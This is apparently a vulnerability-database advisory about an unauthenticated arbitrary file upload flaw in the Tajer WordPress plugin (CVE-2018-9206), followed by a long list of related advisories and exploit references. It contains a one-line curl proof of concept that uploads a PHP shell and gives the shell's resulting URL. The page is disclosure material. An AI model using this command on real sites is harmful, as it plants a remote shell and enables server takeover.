Ryan DewhurstWPEX-ID:655BC140-5BBF-4A7E-B20D-4343A75C0C67

HistoryOct 15, 2018 - 12:00 a.m.

Tajer - Unauthenticated Arbitrary File Upload

2018-10-1500:00:00

Ryan Dewhurst

The tajer WordPress plugin was affected by an Unauthenticated Arbitrary File Upload security vulnerability.

curl -F "[email protected]" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php

Shell is uploaded to:

http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/shell.php

References

www.vapidlabs.com/advisory.php?v=205

packetstorm 2

github 1

checkpoint_advisories 1

prion 1

dsquare 1

zdt 1

veracode 1

metasploit 1

kitploit 2

wpvulndb 2

wpexploit 1

nessus 3

threatpost 1

exploitpack 2

ubuntucve 1

osv 2

patchstack 1

canvas 1

openvas 2

debiancve 1

cve 1

exploitdb 3

impervablog 1

oracle 1

packetstorm

Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload

2019-01-17 00:00:00

blueimp jQuery Arbitrary File Upload

2018-11-05 00:00:00

github

Unrestricted Upload of File with Dangerous Type in blueimp-file-upload

2018-10-22 18:53:56

checkpoint_advisories

Blueimp jQuery File Upload Remote Code Execution (CVE-2018-9206)

2018-11-01 00:00:00

prion

Design/Logic Flaw

2018-10-11 15:29:00

dsquare

jQuery File Upload

2018-10-18 00:00:00

zdt

blueimp jQuery Arbitrary File Upload Exploit

2018-11-05 00:00:00

veracode

Arbitrary File Upload

2018-10-12 02:43:31

metasploit

blueimp's jQuery (Arbitrary) File Upload

2018-10-23 04:35:42

kitploit

JQShell - A Weaponized Version Of CVE-2018-9206 (Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0)

2018-10-29 20:39:00

Darksplitz - Exploit Framework

2019-04-04 21:12:00

wpvulndb

Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload

2020-04-02 00:00:00

Tajer - Unauthenticated Arbitrary File Upload

2018-10-15 00:00:00

wpexploit

Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload

2020-04-02 00:00:00

nessus

jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check)

2018-10-22 00:00:00

Nessus Network Monitor < 6.3.1 Multiple Vulnerabilities (TNS-2023-43)

2023-11-30 00:00:00

Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU)

2019-01-18 00:00:00

threatpost

Thousands of Applications Vulnerable to RCE via jQuery File Upload

2018-10-23 12:31:06

exploitpack

Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit

2019-01-16 00:00:00

jQuery-File-Upload 9.22.0 - Arbitrary File Upload

2018-10-11 00:00:00

ubuntucve

CVE-2018-9206

2018-10-11 00:00:00

osv

Unrestricted Upload of File with Dangerous Type in blueimp-file-upload

2018-10-22 18:53:56

CVE-2018-9206

2018-10-11 15:29:00

patchstack

WordPress Art-Picture-Gallery plugin <= 1.2.9 - Unauthenticated Arbitrary File Upload vulnerability

2020-04-02 00:00:00

canvas

Immunity Canvas: JQUERY_FILE_UPLOAD

2018-10-11 15:29:00

openvas

Blueimp jQuery-File-Upload < 9.24.1 File Upload Vulnerability - Active Check

2018-11-02 00:00:00

Tenable Nessus Network Monitor < 6.3.1 Multiple Vulnerabilities (TNS-2023-43)

2023-11-30 00:00:00

debiancve

CVE-2018-9206

2018-10-11 15:29:00

cve

CVE-2018-9206

2018-10-11 15:29:00

exploitdb

Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit

2019-01-16 00:00:00

blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)

2018-11-06 00:00:00

jQuery-File-Upload 9.22.0 - Arbitrary File Upload

2018-10-11 00:00:00

impervablog

CrimeOps of the KashmirBlack Botnet – Part II

2020-10-22 18:55:05

oracle

Oracle Critical Patch Update Advisory - January 2019

2019-01-15 00:00:00

Products

Security Intelligence
Non-intrusive assessment
Developers SDK
Windows scanner
Linux scanner
Perimeter control tool
MSSP

Database

Vulnerabilities
Exploits
IOC
Security News
BugBounty
Popular
Wild Exploited
Top Vulnerabilities

Tools

Linux Security Scanner
API integration
Subscriptions
Plugins
Manual Audit

Learn More

Stats
API
Docs
Api-keys
License
Pricing
Glossary
FAQ

Company

Blog
Contacts
About Us
OpenSource
EULA
Brand Guideline
Privacy Policy

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please contact us. Using Vulners services you are accepting Vulners services end-user license agreement

@2024 Vulners Inc

JSON

Related for WPEX-ID:655BC140-5BBF-4A7E-B20D-4343A75C0C67